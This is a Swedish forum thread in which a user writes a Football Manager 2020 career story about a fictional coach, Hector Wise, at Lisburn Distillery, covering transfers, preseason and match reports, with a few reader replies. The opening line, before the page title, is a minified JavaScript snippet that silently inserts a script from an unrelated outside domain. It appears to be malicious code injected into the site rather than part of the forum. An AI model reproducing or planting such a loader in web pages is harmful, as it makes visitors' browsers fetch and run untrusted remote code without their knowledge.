;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM20] Under resans gång – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[FM20] Under resans gång

41 Inlägg
4 Users
34 Reactions
2,286 Visningar
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

?Championes, Championes, Ole! Ole! Ole!?

"Vilken tränare! Vilket lag och vilken otrolig säsong hela klubben har haft! Inget kan stoppa dem, Nu är dem på toppen av världen!"

Hector vaknar upp ännu en gång så var det bara en dröm, Han är inte en världskänd tränare ärligt talat så är han inte ens en tränare ännu men det här var start steget i Hectors resa.

Han är en lång och kraftig man som alltid älskat fotboll men aldrig fått möjligheten att spela utan har fått nöja sig med att sitta på läktaren och drömma sig bort. Förra veckan fick han sparken ifrån sitt vardags jobb och när man är ung om man nu kan klassa 26 år gammal som ung så är det dags att chansa på sin dröm, Han säljer allt han äger och säger upp sin lägenhet. Familjen önskar honom lycka till i barndomshuset i utkanten av Sevilla vart han hamnar vet han inte än men han vet att han inte kommer sluta tills han står på toppen och tittar ner.

Det här är alltså en rapport jag tänkte sitta och skriva på när tiden finns, Jag jobbar deltid som materialare i ett Superettan lag och är även en Ungdomstränare i samma klubbs Akademi, Men den här rapporten handlar inte om mig utan om Hectors resa på väg mot den ärofyllda CL bucklan och det är resans mål. Efter det så är vägen öppen och för att göra resan ännu tuffare så startar jag som arbetslös och utan utbildningar eller erfarenhet och kommer försöka bygga mina egna taktiker vilket är något jag är väldig dålig på i FM.

 

Hela EU är laddat och vi får se vart Hector Wise landar!


   
JS7, Armada and Micke reacted
Citera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Hector började tveka, Det här ska vara en pers, Men nu har det gått över två veckor sen han skickade in jobbansökan hos en mängd klubbar över hela Europa. Visst tänkte han för sig själv, Det kanske inte var det mest professionella sättet att söka jobb i olika klubbar, Men om han mejlade alla mejladress på klubbens hemsida så måste någon se hans CV tillslut?

Så blev det, Efter att fått begå intervjuer med olika klubbar över kontinenten med bland annat två Vitryska klubbar, En Walesisk och en Rumänsk klubb så ringde Lisburn Distillery Hector. Klubbens ordförande Jim Greer hade alltid varit svaga för dem spanska influenserna vare sig om det var vinet, kvinnorna eller fotbollen och samma var det nu för Hector.

Jim skötte intervjun och var väldigt hård i hans utgångspunkt. 
"Hector! Vi ser din passion och förstår din ivrighet men du har noll kunskap, noll erfarenheter och noll kontakter. Om jag ska ta in dig fortsatte Jim, Så är det på mina villkor är det förstått?"

Hector förstod, men han visste att får han bara chansen så kommer han fixa det Jim vill ha. Playoff spel.

Pengarna finns inte så Hector fick nöja sig med första erbjudandet Jim kom med, Han hade ändå inte mycket att klaga på, Han får ett rum, mat och 15'000kr i fickan varje månad, men kontraktet är bara skrivet på 4 månader så det gäller att imponera och att imponera fort. 

Trupp analysen började direkt på flygplatsen.
Det såg inte livsfarligt ut men det var inte heller lovande, 17 A-lags spelare och 13 Akademi spelare. Hector har alltid viljat haft 22 spelare som hotar om en startplats och 3 unga spelare som får möjlighet att utvecklas och byggas in i a verksamheten. Sådana möjligheter finns inte nu, Det finns knappt trupp för A-laget, hur ska då U21 och U19 spela sina matcher. Han lyckades hitta några guldkorn att bygga sin taktik runt iallafall, Målvakterna Pat Saunders och Jonah Nicholl var båda godkända för seriens nivå och i reserverna fanns en erfaren Craig Kennedy att utnyttja.

 

Försvaret är lagets stolthet med vassa spelare som är redo för nästa nivå i sina karriärer! dem enda problemet han ser är att laget bara har 2 MB och deras fyra starkaste spelare är alla Ytterbackar! 
Problemen blev bara värre när han också ser att ingen förutom den monstruösa högerbacken Gary Workman med sina 178CM är den största spelaren han kan skola om. Utöver A laget så finns det många försvarare i akademin vilket betyder att Hector kommer behöva använda det som finns.

 

Mittfältet! Vart ska man börja? Kevin Braniff med sina 35 år är lagets nav med erfarenheter ifrån Championship och League 1, Han kommer styra den offensiva delen och förhoppningsvis ligga bakom mycket av vad som kan bli en otrolig säsong. Sen har han den extremt fattiges James Milner i James Wright, Grovjobbare som bara bryr sig om det bästa för laget. Tillsamman med Aaron Harris så kommer denna trio vara dem som spelar mest i den centrala lagdelen.

 

Anfallet lämnar mycket att önska speciellt ifrån bänken, Levererar inte dem på planen så har Hector ingen som kan kliva in och förändra matchbilden. Paul Young, Nick Beta och Mikey Withers ser alla ut att passa bra ihop men det riktiga testet blir inte förrän serien kommer igång. 

 

På flyget så sätter han upp sin taktik, Den ska inte vara för komplicerad men inte heller för enkel att se igenom. Roller och instruktioner får han bestämma under säsongen när han känner spelarna bättre.
han bestämmer sig för att spela säkert med en formation av 1-4-2-3-1, Det är vad han har sett på TV och det är vad han känner sig bekväm med hoppas bara spelarna känner detsamma.

 

Hector har även tiden att kolla in serien. Serien är inte står och är väldigt kort, om han får igång laget tidigt så kan dem ta lätta poäng och säkra hög plats tidigt. 20 omgångar är allt, sen är säsongen slut. Hector får även fram info i en lokal nyhetsartikel som tippar Distillery till en tredje plats. Kraven finns där, Senast 2012/13 spelade laget i högsta serien och har snabbt kraschat ner till där dem är idag, Division 3. Han tänker även på vad som ska hända, Serien drar igång om 6 månader och hans kontrakt är slut om 4 så frågan är, Bygger han upp laget åt sig själv eller någon annan?


   
LeoFM reacted
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Första månaden var en händelselös affär för Hector, Utöver dem sedvanliga presskonferensen så var det dem lovande utgifterna som var på agendan.

Inga truppförändringar in men ut så har Kevin Braniff lämnat tillsammans med tredjemålvakten Craig Kennedy.

Anledningen till att Hector släppte Kevin var för hans sjuka matchbonus, 3750kr per match spelad! i en klubb som är minus 200 tusen på kontot.

"Kevin! Vi kan omöjlighet ge dig en större bonus än vad resten av startelvan får per match. Det högsta jag kan ge dig är 1500kr per match och det är fortfarande otroligt mycket för våran klubb."

"Nej" svarade Kevin och tillade "Jag vet att jag är för bra för att spela under en wannabe som dig och jag vet att jag förtjänar min lön som jag har just nu"

Hector visade honom dörren snabbare än snabbast. Visst han var en av dem viktigaste spelarna men såhär kunde det inte gå till.

Craig Kennedy gick lättare, Hans far har velat att han lämnar fotbollen ett bra tag för att hjälpa till på familjeföretaget. När erbjudandet kom så såg Craig nästan lättnad ut mindes Hector.

 

Tack vare att Craig och Kevin lämnade klubben så minskade vi våran potentiella månadskostnad ifrån 12'500kr till 9'200kr över en natt.

 

Resten av Februari satt med att förhandla varenda krona ifrån alla kontrakt som gick. Tillslut hade Hector sparat in över 50kr per spelare, En liten summa men i Lisburn räknas varenda krona.


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

"Ännu en sen kväll Mr.Wise?" frågar grannen snällt medans hon gör iordning på sin balkong, Hector svarar med en tung suck "Ja, Jag trodde inte det skulle bli så här sent" Hector kommer hem ifrån den fria transferfönstrets sista dag kl 8 på morgonen.

Egentligen blev inte så mycket gjort, Bara en spelare kommer in till Destilleriet men det är en kvalitativ värvning.

Det är en Höger Back som kan spela Centralt med och heter Liam McMenamin och är 29 år gammal.

Det som fick Hector att haja till var Liams pondus, Han tar verkligen över ett omklädningsrum, Med sina slanka ben så kommer han springa väldigt mycket det närmaste året tyvärr så kommer han inte till klubben förrän den 9/6 men det är i god tid för säsongen så Liam kommer vara bekväm i Hectors spelstil innan säsongspremiären.

Laget kliver också ut på semester och Hector passar under tiden på att börja utbilda sig efter att övertalat snåljåpen Jim till att finansiera en utbildning.

Säsongen är långt bort men Hector är mer än redo för säsongen drar igång.


   
jZstrM reacted
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

April månad och nu är vi inne på tredje och näst sista månaden på Hectors kontrakt. Han har haft en dålig känsla sen dag ett om Jim. "Skulle ha skrivit ett två års kontrakt direkt!" tänkte Hector medans han lusade igenom internet efter kontraktslösa desperata ungdomar som behöver hitta en klubb.

Samtidigt som han gör det så letar han även efter ett nytt jobb, Trots allt så har han inte mycket kvar på kontraktet när hans telefon ringer, Det är den snåla ägaren Jim Greer som ringer IGEN, Det måste vara den tusende gången idag. Ska jag behöva vara klubbens IT expert!

"Ja Jim, Vad är det nu?"

"Kom in ASAP, Vi har ett stort problem"

Hector lägger på och börjar klä på sig, Är det såhär hans första chans i fotbollsvärlden ska ta slut?

Han börjar gå mot arenan när hans telefon igen plingar till, Den här gången blir Hector desto gladare för att det är svaret ifrån den unga oprövade anfallaren Timmy Browne som meddelar att han kommer spela för Lisburn näst kommande säsong. Truppen fortsätter bli starkare och starkare för varje dag som går. En roll som han inte fyllt upp en är den central offensiva mittfältaren. Men det får vänta, nu är det dags att prata med Jim

 

"Sätt dig ner Hector!" meddelar Jim starkt.
dem små pratar om hur utbildningen går och om vilka spelare som är på väg in för i en sådan här liten klubb så finns inte utrymmet för en Sportchef vilket betyder att tränaren sköter ALLT runt A-laget, till och med konerna får han plocka.

"Så anledningen att vi är här idag är för att jag tycker vi ska samarbeta i ett år till, Så du faktiskt får några matcher under bältet." Min tanke var att du bara skulle hålla truppen igång under den här försäsongen men värvningarna du har gjort visar stor potential fortsatte Jim, Så där för kommer jag erbjuda dig samma ersättning men för ett år till.

Hector kunde inte skriva på snabbare om han än så försökte tusen gånger.
Han kunde äntligen börja leta permanent boende och börja satsa helhjärtat på jobbet som är på ingång.

 

det är cirka 110 dagar kvar tills säsongen drar igång och Hectors jobb har bara börjat.


   
jZstrM reacted
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Maj månad är klar och lämnar en liten kort uppdatering.

14 träningsmatcher är bokade mot varierande motstånd och några nyförvärv

Adam Wilson är en ung mittback med stor potential som kan kliva in direkt i säsongstarten.

Dale McCreery är en annan ung begåvad mittback som kommer ses som ordinarie där ute under säsongen förutsatt att utvecklingen fortsätter

 

Sist och faktiskt minst är Josh McCarten som kommer få göra korta inhopp under säsongen med förhoppningen att växa in i det till nästa säsong.

Efter att varit i solen under hela dagen så blir rapporten lite kortare idag och jag hoppas kunna trycka på med försäsongen imorgon och tisdag kväll!


   
SvaraCitera
(@jzstrm)
Active Member
Blev medlem: 4 år sedan
Inlägg: 6
 

Riktigt härlig läsning! 


   
SvaraCitera
Iturbe
(@iturbe)
New Member
Blev medlem: 4 år sedan
Inlägg: 3
 

Ser fram emot att läsa fortsättningen! Kör hårt!


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Tyvärr glömde jag datorn nu när jag var iväg med laget. Kommer försäsongs rapport senare ikväll


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

"Madre mia vilken försäsong! Vi har spelat 13 matcher och vinner 11 av dem vilket är bättre än jag förväntade mig!"

Inställningen ni har haft i den här otroligt välspäckade försäsongen är inget annat än exemplariskt. på 13 Matcher på 40 Dagar är helt sinnesjukt och ni gjorde det som det inte var något problem! Ligan kommer få akta sig för oss för vi är fulla med energi! tillade Hector!"

Egentligen var Hector inte riktigt så nöjd. Han hade tagit väldigt lätt motstånd och dem hade skämmigt ut sig vid två tillfällen, Men truppen behövde inte höra det. inte just nu.

Ekonomin är fortfarande helt omöjligt att hålla sig till då det inte finns möjlighet att erbjuda mer än 5 spelare ersättning för att spela och det finns inte en enda spelare som vill spela gratis för klubben! Klubben verkar dock inte klaga, Dem är för tröga för att koppla vilket slags motstånd dem har spelat mot och vad dem möter i serien.

Statistiskt sett så borde dem flesta infinna sig med ett högt självförtroende. På dem 13 matcherna så gjorde klubben 43 Mål och släppte in 10.

Hector har ändå hittat sina viktiga spelare, Framåt kommer Timmy Browne få mycket att jobba med då han stod för 17 Mål och 1 Assist på 8 starter och 4 inhopp, Hector har aldrig gillat att en spelare står för en så stor del av målen men nu har han inget val, Däremot så är han mycket nöjd med att det är hela 18 spelare som gjort assist under försäsongen där Yttern Mikey Withers stod för 4 assist och vinner assistligan.

 

Målvakterna Jonah Nicholl och Pat Saunders har delat på speltiden och ingen ser ut att vara starkare än dem andra så det blir intressant under dem första veckorna i serien. Hector är även nöjd att alla spelare har fått minst 2 matcher att visa upp sig.

Nu är det en vecka till den första matchen i hans förhoppningsvis långa karriär och äran att få stå motstånd mot Hector är Annagh United och är tippade att komma 4:a, En plats över Distillery.

Annagh United har spelat 5 träningsmatcher och är obesegrade med 3 vinster och 2 oavgjorda. Dem har bra utspridning på deras mål med tre olika spelare med 3 mål. Det är något Hector måste vara beredd på.

 

Resan drar igång nästa vecka och Hector passar på att åka hem lite snabbt till Spanien för att hälsa på familjen innan den korta och intensiva säsongen drar igång. Väl hemma i Spanien försöker han locka över några gamla ungdomsspelare han har tränat men ingen vill åka till Nordirland för att spela i princip gratis, Han anklagar dem inte. Vem skulle i sitt rätta mentala skede ta ett jobb i Nordirland?!


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Augusti månad kommer och går, Serien är äntligen igång! 

Vi har hunnit med 3 matcher i serien och även 1 match i en av dem många cuperna.

 

"Timmy Effin Browne, Vilken spelare! otroligt nivå för sin ålder, Han kommer garanterat nå långt!"

"Ska han bära hela Lisburn den här säsongen efter den här drömstarten?" Frågade den gamla reportern för Lisburn Daily News 

"Självklart inte" dånade ut över rummet, Lisburn har fått den drömstart dem ville få, en bekväm 4-1 vinst mot Annagh där Timmy Browne stod för alla 4 mål. Gary Workman dunkade även in 3 av dem 4 assisterna och alla verkar vara väldigt avslappnade i omklädningsrummet efter matchen.

Nyinsatta kaptenen Liam tar tag i segertalet vilket Hector inte har något problem med. "Boys! Spelar vi som vi gjorde idag så kommer ingen i ligan kunna utmana oss. Vi är otroliga och vi gav dem inte en centimeter! Jäkla stark insats idag grabbar!"

Hector belönar dem med en ledig förmiddag dagen efter, Trots den bra starten så vill inte Hector slappna av än, "Tänk om vi förlorar allt efter det här? det finns så många svaga delar i vårat uppspel och låt mig inte börja prata om jobbet defensivt i mittfältet!"

"Andas" svarar kallt Steven Perry Assisterande tränare. "Det är din första tävlingsmatch här och vi har 19 matcher kvar i ligan, jag kan garantera att vi kommer vinna när vi förtjänar att förlora och vi kommer förlora när vi förtjänar att vinna men jag kan också garantera att vi kommer få fira mer än vad vi kommer få sörja! Lisburn Distillery har inte sett så här starkt ut på flera år!"

Steven har rätt, Det är inget att bry sig om än, säsongen är ung och det finns gott om tid för att lösa alla problem

 

Omgång 2 kommer snabbt och det är dags att möta Newington Y.C. som spelade 0-0 i sin öppningsmatch.
Det är ett starkt defensivt lag som inte ger till många chanser och sätter dem chanser dem får.

Det är Hectors första bortamatch och matchen blir även Hectors första förlust efter att Lisburn har haft svårt att behålla bollen och etablera sig högt upp i plan. Ingen spelar särskilt bra och redan efter den här matchen tycker kaptenen att det är dags att prata ihop sig.

Dem har ett spelarmöte där alla håller med om att ingen får slappna av för att dem vinner 1 match, Slitet får inte försvinna förrän dem är uppflyttade. spelarna går ut efter mötet med lysande ögon som är redo att möta Barcelona om det så krävs

 

Men det är inte Barcelona dem ska möta utan det är dags för första matchen i Bet McLean League Cup 2:a omgången och Lisburn ska möta Loughgall, En seg första halvlek byts ut mot en välspelande och högintensiv andra halvlek där Lisburn vinner med 2-1 och går segrande ut efter mål av Gary Workman och ett mål av Timmy Browne. Vi säger även som kapten Liam svarade media efter matchen "On to the next one"

 

Sista matchen I Augusti är emot Tobermore United som startat med en oavgjort och en förslut innan matchen mot Lisburn och även mot Lisburn så skulle dem förlora. Browne gjorde mål igen och har redan gjort 6 mål den här säsongen. Dale McCreery gjorde även sitt första mål för säsongen. Matchen var dock allt annat än finspelad, Tobermore fick 3 gula kort och Lisburn fick även dem ihop 3 gula kort. även idag missade Gary Workman än straff, Hector överväger att byta ut honom i fortsättningen, Straffar ska ju bara sitta!

 

Så efter Augusti månad ligger Lisburn bra till. Dem är 3:a i tabellen och har stora möjligheter att klättra vidare i tabellen.


Timmy Browne leder skytteligan med sina 5 mål och Gary Workman har flest assist med sina 4 poäng.

Dem är även vidare i Bet McLean League Cup där dem ska möta Ballymena United i nästa omgång.

fansen utser den här månaden Tommy Browne till månadens spelare vilket är absolut förtjänt.

 

September månad ser lugn ut med 5 matcher varav en är i Steel & Sons-cupen 2:a omgången


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Tack vare det intensiva spelet i cupen så blev det tillslut 7 matcher i September för Lisburn Distellery. 3 i serien, 3 i Steel & Sons-cupen och 1 i County Antrim Shield.

 

Första matchen för September månad var för en cup man kan likna vid dem lägre Nationella cuperna där proffslagen inte får medverka, Hector som vill vinna pokaler satsar självklart på denna cup. Totalt har han 5 cuper att välja på och Hector har målet på att vinna två cuper plus serien för att ta hem en trippel i sin första säsong.

Det är inte något enkelt att uppnå men Hector har en bred och stark trupp.
Första matchen i Steel & Sons-cupen är emot Wakehurst som besegras med 4-3 med lätt rotation i truppen.

Andra matchen i cupen är mot Carrick Rangers reserver och dem valde ändå att ställa upp ett starkt lag. Kanske för att ge sina junisar en chans att få känna på fotboll på seniornivå. Självklart ska vi visa dem tänkte Hector och ställde upp sitt starkaste lag och vinner tillslut med 1-0 efter Conall Arnold gjort mål.

 

Tredje matchen för månaden var i County Antrim Shield där de nu mötte Carrick Rangers första lag och den här gången blev det för tufft med ett insläppt mål i 119:e minuten, Det var mycket känslor i matchen och båda lagen tog tillsammans 9 gula kort, Var det en taktik ifrån Carrick att sparka bort deras motståndare tills dem tappar huvudet? Hector känner det men domarna ville inte ens ta emot hans överklagan, Skrot ändå. "Jag ville ändå inte satsa på den cupen" svarar Hector till media.

 

Efter två veckor med cupspel så var det dags för Seriematch igen och den här gången är det match mot Moyola Park. 2 Förluster och 1 oavgjord så Distillery går in med stora övertaget.

Men ett trött sprunget Distillery är lätt att rulla ut och tillslut så gör faktiskt Moyola 1-0 i 15:e minuten.

På sidlinjen vevar Hector frenetiskt. Det är en pinsam ifrån hela laget på planen. I halvtid får hela laget höra vad han tycker, Det tar så lång tid att dem är 1 minut sena ut ifrån omklädningsrummet, Det blir turligt nog inget straff ifrån förbundet och i andra halvlek så ser Distillery ut som dem ska, Dem gör 1-1 via Timmy Browne och i 81:a så är Paul Young först på ett inlägg och tar hem tre poäng åt Lisburn.

 

Laget känner sig fortfarande slitet så under veckan kör dem låg intensiva pass där dem jobbar på att täcka upp rätt ytor i defensiva situationer. Matchen på helgen är emot Portstewart som har 2 Förluster och 1 Oavgjord inför matchen, I omklädningsrummet pratar Hector om vikten av att spela enkelt. Han noterar innan matchen att alla inte känns riktigt 100, Det finns någon tvekan. 

När matchen börjar så dominerar Distillery både bollinnehav och får mer avslut men det vill sig bara inte, laget är oslipat och är inte fokuserade vid rätt tillfällen medans Portstewarts spelare är hungriga, drivna och framför allt förberedda med sin matchplan, Dem kontrar och krigar sig till en 3-1 vinst och som vanligt är det Timmy Browne som gör tröstmålet för Distillery.

 

Truppen åker besviket hemåt, Dem har nu haft 5 bortamatcher i rad och resandet börjar ta ut sin rätt. Hector längtar hem till deras arena, även om den är fullständigt katastrof dålig.

 

Sista matchen denna månad i S&S cupen är emot amatörlaget Strabane Athletic, Truppen blir roterad och Hector ser till att spela dem spelarna som har något att bevisa. Trots total dominans så vill inte målet komma. Dem två viktigaste spelarna byts in och i 86:e gör Gary Workman 1-0 och 3 minuter senare fastställer Timmy Browne resultatet med mål på straff.

Planen baksköt ändå, han var tvungen att spela 3 spelare han ville vila och inför sista ligamatchen den här månaden så vill han inte tappa alltför mycket på dem ovanför.

Sista ligamatchen och det märks att det är ett bottenlag mot ett väldigt slitet lag. Ingenting spännande händer och matchen slutar 0-0

 

I slutet av månaden så ligger Distillery fortfarande 2:a i ligan men dem har en match mer spelad

Hectors mål i Oktober är att försöka öka på lagets målskillnad och dessutom ta över förstaplatsen, Ligan måste ändå gå före.

 

Månadens lirare blir ännu en gång Timmy Browne som levererar bra framför mål och även gör ett ordentligt jobb i pressen efter bolltapp. Timmy leder fortfarande skytteligan och Gary har fortfarande greppet på över assistsligan


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Ledig dag på jobbet och då kommer uppdateringarna thick and fast!

 

Oktober månad innehåller 6 matcher varav 2 är i ligan.

 

Första matchen är emot Dollingstown i serien och Timmy fortsätter göra mål, 2 mål idag vilket ger oss 2-0 vinsten i en relativt enkel match.

 

Andra matchen för månaden är i Bet McLean League Cup där vi mötte Ballymena United som spelar i Nordirländska Premier League två nivåer över oss. Hector väljer att offra den här matchen och ställer upp med ett B-tonat lag. Första halvlek är jämn på bollinnehavet men Ballymena kommer till avslut i varje anfall. Dock så går dem in i halvtidsvilan med en 1-0 ledning. Allt är fortfarande möjligt och Hector väljer att trycka upp lite mer.
Det ger resultat och redan i 51:a gör Mikey Withers 1-1 efter att Lisburn enkelt rullat upp Ballymenas försvar.
HB och poängskapare Deluxe Gary Workman gör också 2-1 till klubben i den 59:e och laget faller hem men fortsätter försöka rulla sig igenom pressen som blir högre och högre, även intensivare och intensivare. När allt börjar lugna ner sig så får Josh McCarten sitt andra gula i 71:a och matchen blir vidöppen igen, Ballymena slänger allt och lite till mot Lisburn som i den 86:e minuten kapitulerar och släpper in 2-2, Sista 4 minuter blir spelad på ren vilja av dem 10 som är kvar på planen. Dem fixar 2-2 men det är fortfarande 30 minuter fotboll kvar.
På något mirakulöst sett så överlever dem till straffarna där allt är öppet igen.
Båda lagen sätter alla sina straffar i dem första 7 omgångarna, när Reece Glendinning kliver fram för Ballymena och missar! Allt Hector och hans mannar behöver göra är att sätta nästa straff så är dem vidare. Äran att slå straffen faller på Dale McCreey som iskallt kliver fram och Panenka chippar straffen i mål! Lisburn Distillery är vidare!

 

4 Dagar senare och det är dags för Seriefinal mot kvalificerande motstånd i Limaway United. Trots fler skott på mål och högre bollinnehav så är Limaway för starka, smarta och tekniska. Dem vinner med 2-1 och självklart är det Timmy Browne som gör vårat mål.

 

Nästa match är i S&S Kvartsfinalen mot Bangor som är ett bottenlag i våran serie och Hector tog en chansning igen och tar ut ett väldigt B-tonat lag.
Matchen i sig blir väldigt händelselös förutom att Browne får ett gult kort och är därmed avstängd nästa match vilket är dråpligt.

På straffläggningen missar också Browne sin straff så Bangor går vidare till Semifinal och Lisburn får surt åka hem igen.

 

Efter detta så kliver vi in i den fjärde cupen för året! Intermediate cupen där vi möter Shorts och ett nytt B-tonat lag tar hem vinsten med 3-1 efter att Browne ersättare och debutant gör 2 mål.

 

Sista matchen för månaden är en kvartsfinal match mot Newry City AFC som spelar nivån ovanför oss. För tredje matchen i rad så är det reserverna som ska göra det.

Vi ligger under både en gång och två gånger men båda gångerna visar laget upp det självförtroendet Hector insatt i dem och dem lyckas svara och fixa 2-2 som betyder övertid. I 108:e kommer en Newry spelare dock fri och sätter målet som vinner matchen med 3-2

 

Det är en tuff månad för Lisburn där vi blir utslagna ur två cuper inom 7 dagar. Hector är besviken men det betyder mer tid för att fokusera på ligan och nu har laget fått vila ordentligt så nu finns det inga ursäkter!

Serien har haltat lite under cupspelet så många lag har inte spelat så många serie matcher i Oktober. Vi behåller våran 2:a plats men det är med 1 match mer spelad jämfört med motståndarna. Timmy Browne leder fortfarande skytteligan med sina 10 mål och Gary Workman ligger delad 1:a med 5 Assists.

 


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Nu har vi kommit till November och äntligen ska spelare få ett lugnare schema, Två matcher är allt som är planerat, en i serien och en i cupen.

Seriematchen var mot Bangor och tyvärr så är grabbarna fortfarande slitna och det slutar med förlust för laget med 3-2 efter att ha dominerat skotten och bollinnehavet.

 

Nu var det tre veckors vila och grabbarna körde verkligen lungt. Alla fick ledigt några dagar innan det var hård fysisk träning och taktiskt smarta intensiva pass.

inför cupmatchen mot Ballymena reserver så var laget utvilat, tränade och i form.

Matchen gick precis dit vi ville och vi springer iväg med en stark 5-1 vinst och förhoppningsvis så kan vi ta med det in i serien där vi har börjat tappat lite.

Serien ser som sagt inte så jättebra ut när nästan halva säsongen är spelad. Vi ligger på en svag 5:e plats, 3 poäng ifrån kvalplatsen, Det finns inte på kartan att vi inte kommer 1:a eller 2:a så Hector har mycket att ta tag i.
Han lyckades dock övertala Jim Greer att betala för ytterligare en utbildning så Hector fortsätter bli bättre och bättre och smartare för varje dag som går!


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

"Det här var inte det jag förväntade mig" Utbröt Hector! "Vi har ett av seriens bästa lag och grabbarna förstår taktiken! vad gör jag för fel?"

"Vi alla gör vad vi kan, Vi kan inte förvänta oss att magiskt spela bra när vi inte har ekonomin till att åka buss till bortamatcherna!" sa Steven, Hectors trovärdige Assisterande.

"Vi spelar 5 matcher och vinner bara 1! Vad är det?!"

"Lugn, våra resultat kommer."

"Lugn? Det är 7 omgångar kvar och vi ligger 6 poäng ifrån kvalplatsen!" Det är omöjligt för oss tillade Hector.

Så vad ledde till allt det här diskuterande?

Första matchen var en seriematch mot Armagh och Distillery fick storstryk med 5-2 efter att verkligen allt gått fel defensivt.

Dem gör 1-0 efter 2 minuter och på den vägen var det.

Nästa match var i cupen mot Annagh och där tar vi en enkel 2-0 vinst och går vidare i utan större problem.

Vi möter även dem i nästa omgång i serien och då spelar vi bara 1-1 vilket var väldigt pinsamt då vi bara 4 dagar innan skämde ut dem fullständigt.

 

Efter detta så var Tobermore United på schemat och trots en bra start på matchen så lyckas Lisburn tappa resultatet till 2-1 och kräftgången fortsätter.

 

Sista matchen för månaden var emot Newington där vi trots bra spel inte lyckas göra mål och besviket tar vi även här bara en poäng.

 

Tabellen ser inte bra ut för våra fans, Vi har kämpat och slitit och som tack för allt så ligger vi på en 9:e plats, tredje sista plats.
Det är den största misslyckandet i Nordirländsk fotbollshistoria enligt ägaren Jim Greer


   
trashbag reacted
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Senast vi vann i serien var i början av oktober, vi är nu i Januari och om vi ska vända på det här så är det nu.

Första matchen för månaden var emot Moyola Park och vi övergav 4-3-3 för att gå emot än längre 4-4-2 spelstil och vi lyckades iallafall få en poäng i matchen efter två omställningar.

 

Match nr 2 var också i serien och vi fortsatte med våran 4-4-2 men Banbridge var för starka och kunde enkelt stänga ner våran taktik. Matchen slutar 3-2 och kvalplatsen känns extremt långt bort.

 

Tredje matchen för året var i än av cuperna mot ett lag i högsta ligan, Hector valde att offra matchen helt och ställde upp med sitt tredje lag, matchen slutar 3-0 till Glentoran för att dem valde att spela ett starkt lag.

 

Efter den här matchen så introducerade Hector även sin tredje taktik, en 4-4-2 som ska utnyttja kanterna och bygga sig fram för att lyfta in bollen i boxen och det fick effekt direkt, Lisburn tar sin första vinst i serien på 105 Dagar. Men är det försent att komma igång nu?

 

Vi avslutade även med en till cupmatch och där gick vi segrande så vi hoppas verkligen Hector kan ta den här formen vidare in i slutet av säsongen.

 

Serien ser inte jättebra ut, Det är trots allt bara 4 matcher kvar men om allt går vägen så kan vi fortfarande knipa kvalplatsen, även om det ser näst intill omöjligt ut.


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Näst sista månaden i serien och förhoppningen är fortfarande att ta klivet upp. Även om det ser otroligt omöjligt ut.

Första matchen för månaden var emot Dollingstown som ligger precis ovanför oss i tabellen, Truppen kämpade fortfarande med sin nya Spelidé, Tyvärr förlorar vi matchen med 1-0 efter slarv i försvaret.

 

"Mitt kontor nu!" dånade över arenan dagen efter matchen mot Dollingstown, Jim var rättfärdigt förbannad, han har slängt in alla pengar han har och den där spanska idioten har slösat bort allt och vi kommer inte ens bli uppflyttade! 

"Förklara dig själv Hector! Hur misslyckades du med att fixa uppflyttning åt mig?"

"Jim, Vi har spelat bra det är bara att resultaten inte har gått våran väg, men vi är på g uppåt och det vet du! vi kommer få resultat." Garanterat tillade Hector.

"Jag vet inte varför jag skulle tro på en värdelös desperat spansk tränare, På min tid hade du åkt ut med huvudet före men av någon anledning så tror jag på dig" Resultaten måste bli bättre annars så är du ute snabbare än rollerskates! fattar du?"

Hector nickade nervöst. Hur skulle han lösa det här? Laget går hackigt och han vet inte varför, Träningarna ser bra ut. Spelarna ser också starkare ut en våra motståndare.

 

Han väljer att inte ändra någonting inför nästa match, allt eller inget är det som gäller.

 

2-2 Mot serieledarna är mer än godkänt, Jim har slutat hälsa på mornarna men truppen står fortfarande med Hector och det är all support Hector behöver.

I den enda cupen dem är kvar i så vinner vi med 2-1 i förlängning och får därför spela kvartsfinal, Det kanske är det som kan rädda mig? tänker Hector

 

Inför näst sista seriematchen så lirar han sin favoritelva då ingen är avstängd eller skadad och mot Bangor så lossnar det igen och Timmy Browne gör båda målen i en 2-1 vinst. Uppflyttning är omöjlig men vi kanske kan åka hem med hedern i behåll efter den här säsongen?

 

Serien är som sagt redan spikad för våran del, Vi kommer inte bli uppflyttade och bågen spänns redan nu inför nästa år.

 

